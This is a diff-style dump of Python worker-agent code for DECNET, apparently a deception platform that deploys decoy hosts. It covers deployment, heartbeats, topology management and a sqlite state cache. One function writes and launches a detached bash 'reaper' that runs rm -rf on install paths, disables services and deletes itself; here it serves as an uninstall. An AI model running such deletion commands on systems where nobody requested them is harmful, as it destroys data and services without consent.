    NIC name differs (common in heterogeneous fleets — master on ``wlp6s0``,
    worker on ``enp0s3``). We always re-detect locally; if the worker sits
    on a different subnet than the master, decky IPs are re-allocated from
    the worker's subnet so they're actually reachable.

    Returns:
        A copy of *config* with the locally detected interface, subnet and
        gateway, plus re-addressed deckies when the subnets differ.

    Raises:
        RuntimeError: the local allocator returned fewer addresses than
            there are deckies. Pairing with ``zip`` would otherwise drop the
            surplus deckies silently while the caller still reports the full
            count as deployed.
    """
    local_iface = detect_interface()
    local_subnet, local_gateway = detect_subnet(local_iface)
    local_host_ip = get_host_ip(local_iface)

    updates: dict[str, Any] = {
        "interface": local_iface,
        "subnet": local_subnet,
        "gateway": local_gateway,
    }

    # strict=False: the configured value may carry host bits.
    master_net = IPv4Network(config.subnet, strict=False) if config.subnet else None
    local_net = IPv4Network(local_subnet, strict=False)
    if master_net is None or master_net != local_net:
        log.info(
            "agent.deploy subnet mismatch master=%s local=%s — re-allocating decky IPs",
            config.subnet, local_subnet,
        )
        wanted = len(config.deckies)
        fresh_ips = list(
            allocate_ips(
                subnet=local_subnet,
                gateway=local_gateway,
                host_ip=local_host_ip,
                count=wanted,
            )
        )
        if len(fresh_ips) < wanted:
            raise RuntimeError(
                f"local subnet {local_subnet} yielded {len(fresh_ips)} addresses "
                f"for {wanted} deckies"
            )
        updates["deckies"] = [
            decky.model_copy(update={"ip": ip})
            for decky, ip in zip(config.deckies, fresh_ips)
        ]

    return config.model_copy(update=updates)
|
||||
|
||||
|
||||
async def deploy(config: DecnetConfig, dry_run: bool = False, no_cache: bool = False) -> None:
    """Run the blocking deployer in a worker thread.

    Configs in ``swarm`` mode are first rewritten by ``_relocalize``; other
    modes go to the deployer unchanged. The deployer itself calls
    save_state() internally once the compose file is materialised.
    """
    log.info(
        "agent.deploy mode=%s deckies=%d interface=%s (incoming)",
        config.mode, len(config.deckies), config.interface,
    )
    effective = config
    if config.mode == "swarm":
        effective = _relocalize(config)
        log.info(
            "agent.deploy relocalized interface=%s subnet=%s gateway=%s",
            effective.interface, effective.subnet, effective.gateway,
        )
    # Positional call: (config, dry_run, no_cache, False).
    deployer_args = (effective, dry_run, no_cache, False)
    await asyncio.to_thread(_deployer.deploy, *deployer_args)
|
||||
|
||||
|
||||
async def teardown(decky_id: str | None = None) -> None:
    """Run the deployer's teardown off-loop.

    When no ``decky_id`` is given, the saved state is cleared afterwards as
    well; a teardown for a specific decky leaves the state in place.
    """
    log.info("agent.teardown decky_id=%s", decky_id)
    await asyncio.to_thread(_deployer.teardown, decky_id)
    if decky_id is not None:
        return
    await asyncio.to_thread(clear_state)
|
||||
|
||||
|
||||
def _decky_runtime_states(config: DecnetConfig) -> dict[str, dict[str, Any]]:
    """Map decky_name → {"running": bool, "services": {svc: container_state}}.

    Queried so the master can tell, after a partial-failure deploy, which
    deckies actually came up instead of tainting the whole shard as failed.
    Best-effort: a docker error returns an empty map, not an exception.

    A service's container is looked up as ``<decky>-<service>`` with
    underscores in the service name replaced by dashes; a missing container
    is reported as ``"absent"``. A decky counts as running only when it has
    at least one service and every one of them is ``"running"``.
    """
    try:
        import docker  # local import — agent-only path
        client = docker.from_env()
        try:
            live = {
                c.name: c.status
                for c in client.containers.list(all=True, ignore_removed=True)
            }
        finally:
            # This function runs on every status/heartbeat call; release the
            # client's connection pool instead of leaving it to the GC.
            try:
                client.close()
            except Exception:  # noqa: BLE001 — closing is best-effort
                log.debug("_decky_runtime_states: docker client close failed", exc_info=True)
    except Exception:  # pragma: no cover — defensive
        log.exception("_decky_runtime_states: docker query failed")
        return {}

    out: dict[str, dict[str, Any]] = {}
    for d in config.deckies:
        svc_states = {
            svc: live.get(f"{d.name}-{svc.replace('_', '-')}", "absent")
            for svc in d.services
        }
        out[d.name] = {
            "running": bool(svc_states) and all(s == "running" for s in svc_states.values()),
            "services": svc_states,
        }
    return out
|
||||
|
||||
|
||||
# Bash script that ``self_destruct`` writes to a temp file and launches as a
# detached process.
_REAPER_SCRIPT = r"""#!/bin/bash
# DECNET agent self-destruct reaper.
# Runs detached from the agent process so it survives the agent's death.
# Waits briefly for the HTTP response to drain, then stops services,
# wipes install paths, and preserves logs.
set +e

sleep 3

# Stop decky containers started by the local deployer (best-effort).
if command -v docker >/dev/null 2>&1; then
    docker ps -q --filter "label=com.docker.compose.project=decnet" | xargs -r docker stop
    docker ps -aq --filter "label=com.docker.compose.project=decnet" | xargs -r docker rm -f
    docker network rm decnet_lan 2>/dev/null
fi

# Stop+disable every systemd unit the installer may have dropped.
for unit in decnet-agent decnet-engine decnet-collector decnet-forwarder decnet-prober decnet-reconciler decnet-sniffer decnet-updater; do
    systemctl stop "$unit" 2>/dev/null
    systemctl disable "$unit" 2>/dev/null
done

# Nuke install paths. Logs under /var/log/decnet* are intentionally
# preserved — the operator typically wants them for forensic review.
rm -rf /opt/decnet* /var/lib/decnet/* /usr/local/bin/decnet* /etc/decnet
rm -f /etc/systemd/system/decnet-*.service /etc/systemd/system/decnet-*.timer

systemctl daemon-reload 2>/dev/null
rm -f "$0"
"""
|
||||
|
||||
|
||||
async def self_destruct() -> None:
    """Tear down deckies, then launch a detached reaper script.

    The reaper (``_REAPER_SCRIPT``) sleeps briefly before it starts removing
    things, so this coroutine returns — and the HTTP response can drain —
    before files disappear from under the agent. A failure of the initial
    teardown is logged and does not stop the reaper from being spawned.
    """
    import os
    import shutil
    import subprocess  # nosec B404
    import tempfile

    # Best-effort teardown first — the reaper also runs docker stop, but
    # going through the deployer gives the host-macvlan/ipvlan helper a
    # chance to clean up routes cleanly.
    try:
        await asyncio.to_thread(_deployer.teardown, None)
        await asyncio.to_thread(clear_state)
    except Exception:
        log.exception("self_destruct: pre-reap teardown failed — reaper will force-stop containers")

    # Reaper lives under /tmp so it survives rm -rf /opt/decnet*.
    fd, path = tempfile.mkstemp(prefix="decnet-reaper-", suffix=".sh", dir="/tmp")  # nosec B108 — reaper must outlive /opt/decnet removal
    try:
        os.write(fd, _REAPER_SCRIPT.encode())
    finally:
        os.close(fd)
    os.chmod(path, 0o700)  # nosec B103 — root-owned reaper, needs exec

    # The reaper MUST run outside decnet-agent.service's cgroup — otherwise
    # `systemctl stop decnet-agent` SIGTERMs the whole cgroup (reaper included)
    # before rm -rf completes. `start_new_session=True` gets us a fresh POSIX
    # session but does NOT escape the systemd cgroup, so when `systemd-run`
    # is on PATH the script is launched through it as a transient unit;
    # otherwise (non-systemd host / container) it is started directly.
    # NOTE(review): an earlier comment here said `systemd-run --scope`, but
    # the argv has never passed `--scope` — confirm which form is intended.
    reaper_cmd = ["/bin/bash", path]
    systemd_run = shutil.which("systemd-run")
    if systemd_run:
        argv = [
            systemd_run,
            "--collect",
            "--unit", f"decnet-reaper-{os.getpid()}",
            "--description", "DECNET agent self-destruct reaper",
            *reaper_cmd,
        ]
    else:
        argv = reaper_cmd

    # Fire and forget: stdio is detached and the child is never waited on.
    subprocess.Popen(  # nosec B603
        argv,
        stdin=subprocess.DEVNULL,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
        close_fds=True,
        start_new_session=True,
    )
    launched_via = "systemd-run" if systemd_run else "popen"
    log.warning(
        "self_destruct: reaper spawned path=%s via=%s — agent will die in ~3s",
        path, launched_via,
    )
|
||||
|
||||
|
||||
async def status() -> dict[str, Any]:
    """Report the saved deployment state plus per-decky runtime state.

    With no saved state the reply is ``{"deployed": False, "deckies": []}``.
    Otherwise it carries the mode, compose path, dumped decky models and the
    runtime map from ``_decky_runtime_states``. Both the state load and the
    runtime query run in worker threads.
    """
    saved = await asyncio.to_thread(load_state)
    if saved is None:
        return {"deployed": False, "deckies": []}

    config, compose_path = saved
    runtime = await asyncio.to_thread(_decky_runtime_states, config)
    deckies = [decky.model_dump() for decky in config.deckies]
    return {
        "deployed": True,
        "mode": config.mode,
        "compose_path": str(compose_path),
        "deckies": deckies,
        "runtime": runtime,
    }
|
||||
@@ -1,146 +0,0 @@
|
||||
"""Agent → master liveness heartbeat loop.
|
||||
|
||||
Every ``INTERVAL_S`` seconds the worker posts ``executor.status()`` to
|
||||
``POST <master>/swarm/heartbeat`` over mTLS. The master pins the
|
||||
presented client cert's SHA-256 against the ``SwarmHost`` row for the
|
||||
claimed ``host_uuid``; a match refreshes ``last_heartbeat`` + each
|
||||
``DeckyShard``'s snapshot + runtime state.
|
||||
|
||||
Identity comes from ``/etc/decnet/decnet.ini`` (seeded by the enroll
|
||||
bundle) — specifically ``DECNET_HOST_UUID`` and ``DECNET_MASTER_HOST``.
|
||||
The worker's existing ``~/.decnet/agent/`` bundle (or
|
||||
``/etc/decnet/agent/``) provides the mTLS client cert.
|
||||
|
||||
Started/stopped via the agent FastAPI app's lifespan. If identity
|
||||
plumbing is missing (pre-enrollment dev runs) the loop logs at DEBUG and
|
||||
declines to start — callers don't have to guard it.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import pathlib
|
||||
from typing import Optional
|
||||
|
||||
import httpx
|
||||
|
||||
from decnet.agent import executor as _exec
|
||||
from decnet.logging import get_logger
|
||||
from decnet.swarm import pki
|
||||
from decnet.swarm.log_forwarder import build_worker_ssl_context
|
||||
|
||||
log = get_logger("agent.heartbeat")
|
||||
|
||||
INTERVAL_S = 30.0
|
||||
_TIMEOUT = httpx.Timeout(connect=5.0, read=10.0, write=5.0, pool=5.0)
|
||||
|
||||
_task: Optional[asyncio.Task] = None
|
||||
|
||||
|
||||
def _resolve_agent_dir() -> pathlib.Path:
    """Pick the agent directory.

    Order of precedence: a non-empty ``DECNET_AGENT_DIR`` environment
    variable, then ``/etc/decnet/agent`` if that path exists, then
    ``pki.DEFAULT_AGENT_DIR``.
    """
    import os

    override = os.environ.get("DECNET_AGENT_DIR")
    if override:
        return pathlib.Path(override)

    system_dir = pathlib.Path("/etc/decnet/agent")
    return system_dir if system_dir.exists() else pki.DEFAULT_AGENT_DIR
|
||||
|
||||
|
||||
async def _tick(client: httpx.AsyncClient, url: str, host_uuid: str, agent_version: str) -> None:
    """Send one heartbeat to *url*.

    The body carries the host UUID, agent version and the executor's status
    snapshot, plus a ``topology`` entry when the local topology state can be
    read. Any response other than 204 is logged as a warning; nothing is
    raised for it.
    """
    body: dict = {
        "host_uuid": host_uuid,
        "agent_version": agent_version,
        "status": await _exec.status(),
    }
    # Best-effort: fold in applied-topology snapshot. Failures must never
    # wedge the heartbeat loop — master will fall back to "no topology
    # reported" which triggers a resync if it expected one.
    try:
        from decnet.agent import topology_ops as _topo_ops
        from decnet.agent.topology_store import TopologyStore

        db_path = _resolve_agent_dir() / "topology.db"
        store = TopologyStore(db_path)
        try:
            body["topology"] = _topo_ops.state(store)
        finally:
            store.close()
    except Exception:
        log.debug("heartbeat: topology state unavailable", exc_info=True)

    resp = await client.post(url, json=body)
    # 403 / 404 are terminal-ish — we still keep looping because an
    # operator may re-enrol the host mid-session, but we log loudly so
    # prod ops can spot cert-pinning drift.
    if resp.status_code != 204:
        log.warning(
            "heartbeat rejected status=%d body=%s",
            resp.status_code, resp.text[:200],
        )
|
||||
|
||||
|
||||
async def _loop(url: str, host_uuid: str, agent_version: str, ssl_ctx) -> None:
    """Heartbeat forever: one ``_tick`` every ``INTERVAL_S`` seconds.

    A failing tick is logged and retried after the normal interval.
    Cancellation is re-raised so the task can be stopped.
    """
    log.info(
        "heartbeat loop starting url=%s host_uuid=%s interval=%ss",
        url, host_uuid, INTERVAL_S,
    )
    # One HTTP client is shared by every tick of this loop.
    async with httpx.AsyncClient(verify=ssl_ctx, timeout=_TIMEOUT) as http:
        while True:
            try:
                await _tick(http, url, host_uuid, agent_version)
            except asyncio.CancelledError:
                raise
            except Exception:
                log.exception("heartbeat tick failed — will retry in %ss", INTERVAL_S)
            await asyncio.sleep(INTERVAL_S)
|
||||
|
||||
|
||||
def start() -> Optional[asyncio.Task]:
    """Start the background heartbeat task, or return the one already running.

    Returns ``None`` without starting anything when the host UUID or master
    host is unset, or when the worker SSL context cannot be built — callers
    do not need to guard against either case.
    """
    global _task
    from decnet.env import (
        DECNET_HOST_UUID,
        DECNET_MASTER_HOST,
        DECNET_SWARMCTL_PORT,
    )

    still_running = _task is not None and not _task.done()
    if still_running:
        return _task
    if not (DECNET_HOST_UUID and DECNET_MASTER_HOST):
        log.debug("heartbeat not starting — DECNET_HOST_UUID or DECNET_MASTER_HOST unset")
        return None

    agent_dir = _resolve_agent_dir()
    try:
        ssl_ctx = build_worker_ssl_context(agent_dir)
    except Exception:
        log.exception("heartbeat not starting — worker SSL context unavailable at %s", agent_dir)
        return None

    # The version is informational only; fall back rather than fail.
    try:
        from decnet import __version__ as agent_version
    except Exception:
        agent_version = "unknown"

    url = f"https://{DECNET_MASTER_HOST}:{DECNET_SWARMCTL_PORT}/swarm/heartbeat"
    heartbeat = _loop(url, DECNET_HOST_UUID, agent_version, ssl_ctx)
    _task = asyncio.create_task(heartbeat, name="agent-heartbeat")
    return _task
|
||||
|
||||
|
||||
async def stop() -> None:
    """Cancel the heartbeat task, wait for it to finish, and forget it.

    Does nothing when no task was started. Whatever the task raises while
    winding down — cancellation included — is swallowed.
    """
    global _task
    task = _task
    if task is None:
        return
    task.cancel()
    try:
        await task
    except (asyncio.CancelledError, Exception):
        pass
    _task = None
|
||||
@@ -1,70 +0,0 @@
|
||||
"""Worker-agent uvicorn launcher.
|
||||
|
||||
Starts ``decnet.agent.app:app`` over HTTPS with mTLS enforcement. The
|
||||
worker must already have a bundle in ``~/.decnet/agent/`` (delivered by
|
||||
``decnet swarm enroll`` from the master); if it does not, we refuse to
|
||||
start — unauthenticated agents are not a supported mode.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
import pathlib
|
||||
import signal
|
||||
import subprocess # nosec B404
|
||||
import sys
|
||||
|
||||
from decnet.logging import get_logger
|
||||
from decnet.swarm import pki
|
||||
|
||||
log = get_logger("agent.server")
|
||||
|
||||
|
||||
def run(host: str, port: int, agent_dir: pathlib.Path = pki.DEFAULT_AGENT_DIR) -> int:
    """Launch uvicorn for the agent app over HTTPS with client certs required.

    Returns:
        ``2`` when no worker bundle can be loaded from *agent_dir*; otherwise
        the uvicorn process's exit status, or ``0`` if the process group was
        already gone when an interrupt was being forwarded.
    """
    if pki.load_worker_bundle(agent_dir) is None:
        print(
            f"[agent] No cert bundle at {agent_dir}. "
            f"Run `decnet swarm enroll` from the master first.",
            file=sys.stderr,
        )
        return 2

    tls_args = [
        "--ssl-keyfile", str(agent_dir / "worker.key"),
        "--ssl-certfile", str(agent_dir / "worker.crt"),
        "--ssl-ca-certs", str(agent_dir / "ca.crt"),
        # 2 == ssl.CERT_REQUIRED — clients MUST present a CA-signed cert.
        "--ssl-cert-reqs", "2",
    ]
    cmd = [
        sys.executable, "-m", "uvicorn", "decnet.agent.app:app",
        "--host", host,
        "--port", str(port),
        *tls_args,
    ]
    log.info("agent starting host=%s port=%d bundle=%s", host, port, agent_dir)
    # Own process group for clean Ctrl+C / SIGTERM propagation to uvicorn
    # workers (same pattern as `decnet api`).
    proc = subprocess.Popen(cmd, start_new_session=True)  # nosec B603
    try:
        return proc.wait()
    except KeyboardInterrupt:
        # Ask the whole group to stop, give it ten seconds, then force-kill.
        group = proc.pid
        try:
            os.killpg(group, signal.SIGTERM)
            try:
                return proc.wait(timeout=10)
            except subprocess.TimeoutExpired:
                os.killpg(group, signal.SIGKILL)
                return proc.wait()
        except ProcessLookupError:
            return 0
|
||||
@@ -1,208 +0,0 @@
|
||||
"""Agent-side topology apply/teardown/state primitives.
|
||||
|
||||
Wraps the compose + bridge machinery from :mod:`decnet.engine.deployer`
|
||||
so the agent can drive a topology without ever touching the master's
|
||||
sqlmodel repo. The master-side ``deploy_topology`` always calls
|
||||
``transition_status(repo, …)`` which is useless (and unreachable) on
|
||||
an agent — here we operate purely on a hydrated dict + the local
|
||||
:class:`TopologyStore`.
|
||||
|
||||
v1 constraint: one topology per agent. A second apply for a different
|
||||
``topology_id`` triggers an on-the-spot teardown of the predecessor
|
||||
before the new apply proceeds — master is authoritative.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import subprocess # nosec B404
|
||||
from typing import Any
|
||||
|
||||
import docker
|
||||
|
||||
from decnet.agent.topology_store import (
|
||||
TopologyStore,
|
||||
observed,
|
||||
)
|
||||
from decnet.engine.deployer import (
|
||||
_compose,
|
||||
_compose_with_retry,
|
||||
_teardown_order,
|
||||
_topology_compose_path,
|
||||
)
|
||||
from decnet.logging import get_logger
|
||||
from decnet.network import create_bridge_network, remove_bridge_network
|
||||
from decnet.topology.compose import (
|
||||
_network_name as _topology_network_name,
|
||||
write_topology_compose,
|
||||
)
|
||||
from decnet.topology.hashing import canonical_hash
|
||||
from decnet.topology.validate import (
|
||||
ValidationError,
|
||||
errors as _validation_errors,
|
||||
validate as _validate_topology,
|
||||
)
|
||||
|
||||
log = get_logger("agent.topology_ops")
|
||||
|
||||
|
||||
class HashMismatch(RuntimeError):
    """The master's ``version_hash`` differs from the locally computed hash.

    Suggests serialisation drift between master and agent; the apply is
    refused loudly instead of papering over a schema mismatch.
    """
|
||||
|
||||
|
||||
def _topology_id(hydrated: dict[str, Any]) -> str:
    """Return ``hydrated["topology"]["id"]`` as a string.

    Raises:
        ValueError: the ``topology`` entry is missing, is not a mapping, or
            has no truthy ``id``. A non-mapping entry used to escape as an
            AttributeError; it is now reported the same way as a missing id.
    """
    topo = hydrated.get("topology")
    tid = topo.get("id") if isinstance(topo, dict) else None
    if not tid:
        raise ValueError("hydrated topology missing topology.id")
    return str(tid)
|
||||
|
||||
|
||||
async def apply(
    hydrated: dict[str, Any],
    version_hash: str,
    store: TopologyStore,
) -> None:
    """Materialise *hydrated* on this agent and record it in *store*.

    Steps: verify the hash, validate the topology, tear down any different
    topology already recorded, create one bridge network per LAN, write the
    compose file, run ``compose up``, then record the result in the store.

    Raises:
        HashMismatch: master and agent disagree on the canonical hash —
            don't touch docker, fail the apply.
        ValidationError: topology fails structural validation.
        Any docker / compose error propagates up; the endpoint maps it
        to 500 and records the message on the store row.
    """
    local_hash = canonical_hash(hydrated)
    if local_hash != version_hash:
        raise HashMismatch(
            f"master hash {version_hash!r} does not match agent hash "
            f"{local_hash!r} — refusing to apply"
        )

    issues = _validate_topology(hydrated)
    if _validation_errors(issues):
        raise ValidationError(issues)

    topology_id = _topology_id(hydrated)
    # Master is authoritative. If a different topology is pinned here
    # — whether it fully applied, only partially applied (failure
    # marker row + orphan containers), or drifted — teardown first,
    # then accept the new one. Refusing with 409 would leave the
    # agent stuck in a state only a human could resolve.
    existing = store.current()
    if existing is not None and existing.topology_id != topology_id:
        log.info(
            "superseding topology %s with %s on master authority",
            existing.topology_id, topology_id,
        )
        try:
            await teardown(existing.topology_id, store)
        except Exception as exc:  # noqa: BLE001 — we still want to try applying
            log.warning(
                "best-effort teardown of superseded topology %s failed: %s",
                existing.topology_id, exc,
            )
            # Hard-clear the store row so the new apply isn't blocked
            # by a half-torn-down predecessor. Leftover docker objects
            # will surface via the next heartbeat's observed block.
            store.clear(existing.topology_id)

    lans = hydrated["lans"]
    compose_path = _topology_compose_path(topology_id)
    client = docker.from_env()

    # Bridges + compose are sync/blocking; hop to a thread so we don't
    # stall the event loop on a slow docker daemon.
    def _materialise() -> None:
        try:
            for lan in lans:
                net_name = _topology_network_name(topology_id, lan["name"])
                # Only LANs flagged as DMZ get a non-internal bridge.
                internal = not lan["is_dmz"]
                create_bridge_network(
                    client, net_name, lan["subnet"], internal=internal
                )
        finally:
            # The client is only needed for bridge creation; release its
            # connections here instead of leaking one client per apply.
            try:
                client.close()
            except Exception:  # noqa: BLE001 — closing is best-effort
                log.debug("docker client close failed", exc_info=True)
        write_topology_compose(hydrated, compose_path)
        # ``--always-recreate-deps`` keeps service containers' netns shares
        # fresh: every decky service joins its base's netns via
        # ``network_mode: container:<base>``, and that share is bound at
        # service start time. If a base is recreated (e.g. when ``ports:``
        # changes after toggling ``forwards_l3``) but compose decides the
        # services are unchanged, the services keep a stale netns FD
        # pointing at the destroyed base — they end up in an empty
        # namespace with only ``lo``, and external traffic hits a closed
        # port on the live base. Forcing dependents to recreate alongside
        # the base is the cheapest way to make this race impossible.
        _compose_with_retry(
            "up", "--build", "-d", "--always-recreate-deps",
            compose_file=compose_path,
        )

    await asyncio.to_thread(_materialise)

    store.put(topology_id, version_hash, hydrated)
    log.info(
        "topology %s applied on agent (%d LANs)", topology_id, len(lans)
    )
|
||||
|
||||
|
||||
async def teardown(
    topology_id: str,
    store: TopologyStore,
) -> None:
    """Tear down *topology_id* on this agent. Idempotent: if there's no
    record and no compose file, it's a no-op that still returns cleanly.

    A failing ``compose down`` is logged and does not stop bridge removal.
    Bridges are only removed when the store still holds the hydrated blob
    for this topology, since that blob is the source of the LAN names.
    The store row is cleared at the end.
    """
    row = store.current()
    # Prefer the stored hydrated blob — it's what we applied with. If
    # it's gone (db wiped) but compose-file lingers, we still try to
    # compose-down and delete bridges by scanning the compose file's
    # LAN membership list via the hydrated blob if available.
    hydrated = row.hydrated if row and row.topology_id == topology_id else None
    compose_path = _topology_compose_path(topology_id)
    client = docker.from_env()

    def _dismantle() -> None:
        try:
            if compose_path.exists():
                try:
                    _compose("down", "--remove-orphans", compose_file=compose_path)
                except subprocess.CalledProcessError as exc:
                    log.warning(
                        "topology %s compose down failed (continuing): %s",
                        topology_id, exc,
                    )
            if hydrated is not None:
                for lan_name in _teardown_order(hydrated["lans"]):
                    net_name = _topology_network_name(topology_id, lan_name)
                    remove_bridge_network(client, net_name)
        finally:
            # Release the docker client's connections instead of leaking
            # one client per teardown.
            try:
                client.close()
            except Exception:  # noqa: BLE001 — closing is best-effort
                log.debug("docker client close failed", exc_info=True)
        if compose_path.exists():
            compose_path.unlink()

    # Compose and bridge removal are blocking; keep them off the event loop.
    await asyncio.to_thread(_dismantle)
    store.clear(topology_id)
    log.info("topology %s torn down on agent", topology_id)
|
||||
|
||||
|
||||
def state(store: TopologyStore) -> dict[str, Any]:
    """Snapshot-plus-live-observation — the shape the heartbeat embeds.

    Returns a dict with ``topology_id``, ``applied_version_hash``,
    ``applied_at`` and ``last_error`` (all ``None`` when the store is empty)
    plus ``observed``. If docker cannot be queried, ``observed`` is
    ``{"error": <message, at most 200 chars>}`` instead.
    """
    row = store.current()
    try:
        client = docker.from_env()
        try:
            obs = observed(client)
        finally:
            # Called on every heartbeat: release the client's connections
            # rather than leaking a new client each time.
            try:
                client.close()
            except Exception:  # noqa: BLE001 — closing is best-effort
                log.debug("docker client close failed", exc_info=True)
    except Exception as exc:  # noqa: BLE001 — docker socket may be gone
        obs = {"error": str(exc)[:200]}

    return {
        "topology_id": row.topology_id if row is not None else None,
        "applied_version_hash": row.applied_version_hash if row is not None else None,
        "applied_at": row.applied_at if row is not None else None,
        "last_error": row.last_error if row is not None else None,
        "observed": obs,
    }
|
||||
|
||||
|
||||
__all__ = ["apply", "teardown", "state", "HashMismatch"]
|
||||
@@ -1,213 +0,0 @@
|
||||
"""Agent-side sqlite cache of the currently-applied topology.
|
||||
|
||||
**This is a cache, not a source of truth.** The master is the only
|
||||
authority for what the agent should be running. This store exists so
|
||||
the agent can answer two questions quickly and offline:
|
||||
|
||||
1. What topology did I last apply, and with what version hash?
|
||||
2. Is what docker is currently doing consistent with that?
|
||||
|
||||
The hash goes out on every heartbeat; the master compares it to what
|
||||
it thinks this host should be running and schedules a re-push on
|
||||
mismatch.
|
||||
|
||||
Why sqlite when the blob is JSON? Consistent with
|
||||
:mod:`decnet.swarm.log_forwarder._OffsetStore` — single-row sqlite is
|
||||
the project-wide pattern for agent-local persistent state. Keeps
|
||||
operational mental model small: "one state.db per thing".
|
||||
|
||||
Design choices worth calling out:
|
||||
|
||||
- **One row, one topology.** v1 only supports a single topology per
|
||||
agent. Attempting to :meth:`put` a different ``topology_id`` while
|
||||
a row already exists raises :class:`AlreadyApplied` — the agent
|
||||
rejects the apply with 409 and the master is expected to teardown
|
||||
the old one first.
|
||||
- **No auto-restore on boot.** The agent does NOT read this db at
|
||||
startup and try to re-apply. Whatever docker has after a restart
|
||||
is what it has; the next heartbeat reports the truth and the
|
||||
master decides whether to re-push. Same reason we don't sync
|
||||
mutations from agent → master anywhere else: split-brain is worse
|
||||
than temporary drift.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import pathlib
|
||||
import sqlite3
|
||||
import time
|
||||
from dataclasses import dataclass
|
||||
from typing import Any, Optional
|
||||
|
||||
|
||||
class AlreadyApplied(RuntimeError):
    """A topology other than the requested one is already recorded here."""
|
||||
|
||||
|
||||
@dataclass(frozen=True)
class AppliedRow:
    """Immutable view of the single ``applied_topology`` row."""

    topology_id: str
    applied_version_hash: str
    # Decoded from the row's JSON blob column.
    hydrated: dict[str, Any]
    # Stored as an INTEGER column; units are not visible from the read path.
    applied_at: int
    # ``None`` when the row carries no error text.
    last_error: Optional[str]
|
||||
|
||||
|
||||
class TopologyStore:
    """Single-row sqlite cache. Stdlib only, sync (called from endpoints).

    Every write runs inside ``with self._conn:`` so that a statement which
    fails (constraint violation, bad parameter) is rolled back instead of
    leaving an implicit transaction open on the shared connection.
    """

    def __init__(self, db_path: pathlib.Path) -> None:
        """Open (creating if needed) the state db at *db_path*.

        The parent directory is created when missing and the
        ``applied_topology`` table is created on first use.
        """
        db_path.parent.mkdir(parents=True, exist_ok=True)
        # check_same_thread=False: Starlette/FastAPI runs sync endpoint
        # bodies on a worker thread distinct from where `app` is imported.
        # The agent is single-process, so there's no real contention —
        # sqlite's own connection lock is enough.
        self._conn = sqlite3.connect(str(db_path), check_same_thread=False)
        with self._conn:
            self._conn.execute(
                "CREATE TABLE IF NOT EXISTS applied_topology ("
                " topology_id TEXT PRIMARY KEY,"
                " applied_version_hash TEXT NOT NULL,"
                " hydrated_blob_json TEXT NOT NULL,"
                " applied_at INTEGER NOT NULL,"
                " last_error TEXT)"
            )

    # ----------------------------------------------------------------- reads

    def current(self) -> Optional[AppliedRow]:
        """Return the single applied topology, or ``None`` if idle."""
        row = self._conn.execute(
            "SELECT topology_id, applied_version_hash, hydrated_blob_json,"
            " applied_at, last_error FROM applied_topology LIMIT 1"
        ).fetchone()
        if row is None:
            return None
        return AppliedRow(
            topology_id=row[0],
            applied_version_hash=row[1],
            hydrated=json.loads(row[2]),
            applied_at=int(row[3]),
            last_error=row[4],
        )

    # ---------------------------------------------------------------- writes

    def put(
        self,
        topology_id: str,
        applied_version_hash: str,
        hydrated: dict[str, Any],
    ) -> None:
        """Record an applied topology.

        If a *different* topology is already recorded, raises
        :class:`AlreadyApplied`. Re-applying the same ``topology_id``
        just updates the hash + blob (idempotent re-push) and clears any
        stored ``last_error``.

        Raises:
            AlreadyApplied: the stored row has another ``topology_id``.
            sqlite3.Error: the write failed; the transaction is rolled back.
        """
        existing = self.current()
        if existing is not None and existing.topology_id != topology_id:
            raise AlreadyApplied(
                f"agent already has topology {existing.topology_id!r}; "
                f"cannot apply {topology_id!r}"
            )
        # Serialise before opening the transaction so a non-JSON-able blob
        # fails without touching the database.
        params = (
            topology_id,
            applied_version_hash,
            json.dumps(hydrated, sort_keys=True),
            int(time.time()),
        )
        with self._conn:  # commit on success, rollback on error
            self._conn.execute(
                "INSERT INTO applied_topology"
                " (topology_id, applied_version_hash, hydrated_blob_json,"
                " applied_at, last_error)"
                " VALUES (?, ?, ?, ?, NULL)"
                " ON CONFLICT(topology_id) DO UPDATE SET"
                " applied_version_hash=excluded.applied_version_hash,"
                " hydrated_blob_json=excluded.hydrated_blob_json,"
                " applied_at=excluded.applied_at,"
                " last_error=NULL",
                params,
            )

    def record_error(
        self,
        topology_id: str,
        message: str,
        hydrated: Optional[dict[str, Any]] = None,
    ) -> None:
        """Attach a last-error message for *topology_id*.

        Upserts a marker row when no apply has yet succeeded for this
        topology — that way a failure *during* the first materialise
        (put() hasn't been reached) still surfaces via GET
        /topology/state and the next heartbeat. The marker row uses an
        empty ``applied_version_hash`` so master's heartbeat check sees
        the hash mismatch and schedules a resync.

        If *hydrated* is provided it is stored so a later teardown can
        still walk the LAN list — otherwise a partial deploy strands
        containers + bridges with no breadcrumb back to them. An existing
        non-empty blob is never overwritten; only a ``'{}'`` placeholder
        is replaced.
        """
        blob = json.dumps(hydrated, sort_keys=True) if hydrated else "{}"
        with self._conn:  # commit on success, rollback on error
            self._conn.execute(
                "INSERT INTO applied_topology"
                " (topology_id, applied_version_hash, hydrated_blob_json,"
                " applied_at, last_error)"
                " VALUES (?, '', ?, 0, ?)"
                " ON CONFLICT(topology_id) DO UPDATE SET"
                " last_error=excluded.last_error,"
                " hydrated_blob_json=CASE"
                " WHEN applied_topology.hydrated_blob_json='{}'"
                " THEN excluded.hydrated_blob_json"
                " ELSE applied_topology.hydrated_blob_json END",
                (topology_id, blob, message),
            )

    def clear(self, topology_id: str) -> None:
        """Remove the row for *topology_id* (post-teardown).

        No-op if the row doesn't exist — makes teardown idempotent.
        """
        with self._conn:  # commit on success, rollback on error
            self._conn.execute(
                "DELETE FROM applied_topology WHERE topology_id=?",
                (topology_id,),
            )

    def close(self) -> None:
        """Close the underlying sqlite connection."""
        self._conn.close()
|
||||
|
||||
|
||||
# --------------------------------------------------- live docker observation
|
||||
|
||||
|
||||
def observed(docker_client: Any) -> dict[str, Any]:
    """Report which DECNET bridges and containers docker currently shows.

    The result is a small dict meant to ride along on the heartbeat so the
    master can compare ``applied_version_hash`` with what is really there
    (a matching hash with missing bridges is still drift).

    Returns:
        ``{"bridges": [...], "containers": [...]}`` with both lists sorted,
        or ``{"error": <message truncated to 200 chars>}`` when anything
        goes wrong while talking to docker. Never raises — the agent still
        has to heartbeat, and the master can treat ``error`` as
